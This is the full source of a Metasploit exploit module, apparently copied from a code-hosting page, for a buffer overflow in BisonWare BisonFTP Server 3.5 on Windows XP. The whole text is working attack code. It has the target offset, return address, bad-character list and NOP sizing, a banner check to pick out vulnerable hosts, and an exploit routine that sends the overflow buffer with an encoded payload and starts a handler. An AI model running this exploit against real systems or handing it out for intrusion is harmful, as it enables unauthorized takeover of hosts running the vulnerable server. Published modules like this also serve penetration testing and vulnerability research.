Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Ftp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'BisonWare BisonFTP Server Buffer Overflow',
14
      'Description'    => %q{
15
        BisonWare BisonFTP Server 3.5 is prone to an overflow condition.
16
        This module exploits a buffer overflow vulnerability in the said
17
        application.
18
      },
19
      'Platform'       => 'win',
20
      'Author'         =>
21
        [
22
          'localh0t', # initial discovery
23
          'veerendragg @ SecPod', # initial msf
24
          'Jay Turla' # msf
25
        ],
26
      'License'        => MSF_LICENSE,
27
      'References'     =>
28
        [
29
          [ 'CVE', '1999-1510'],
30
          [ 'BID', '49109'],
31
          [ 'EDB', '17649'],
32
          [ 'URL', 'http://secpod.org/msf/bison_server_bof.rb']
33
        ],
34
      'Privileged'     => false,
35
      'DefaultOptions' =>
36
        {
37
          'VERBOSE'  => true
38
        },
39
      'Payload'        =>
40
        {
41
          'Space'           => 310,
42
          'BadChars'        => "\x00\x0a\x0d",
43
          'StackAdjustment' => -3500,
44
        },
45
      'Targets'        =>
46
        [
47
          [ 'Bisonware FTP Server / Windows XP SP3 EN',
48
            {
49
              'Ret'    => 0x0040333f,
50
              'Offset' => 1028,
51
              'Nops'   =>  404
52
            }
53
          ],
54
        ],
55
      'DefaultTarget'  => 0,
56
      'DisclosureDate' => '2011-08-07'))
57
  end
58

59
  def check
60
    connect_login
61
    disconnect
62
    if /BisonWare BisonFTP server product V3\.5/i === banner
63
      return Exploit::CheckCode::Appears
64
    else
65
      return Exploit::CheckCode::Safe
66
    end
67
  end
68

69
  def exploit
70
    connect
71
    print_status('Triggering the prompt for an unregistered product')
72
    sock.put('')
73
    print_status('Disconnecting...')
74
    disconnect
75

76
    print_status('Connecting for the second time to deliver our payload...')
77
    connect #connect for the second time
78

79
    buf = rand_text_alpha(target['Offset'])
80
    buf << payload.encoded
81
    buf << make_nops( (target['Nops']) - payload.encoded.length)
82
    buf << [target.ret].pack('V')
83
    print_status('Sending payload...')
84

85
    sock.put(buf)
86
    handler
87
    disconnect
88
  end
89
end
90

91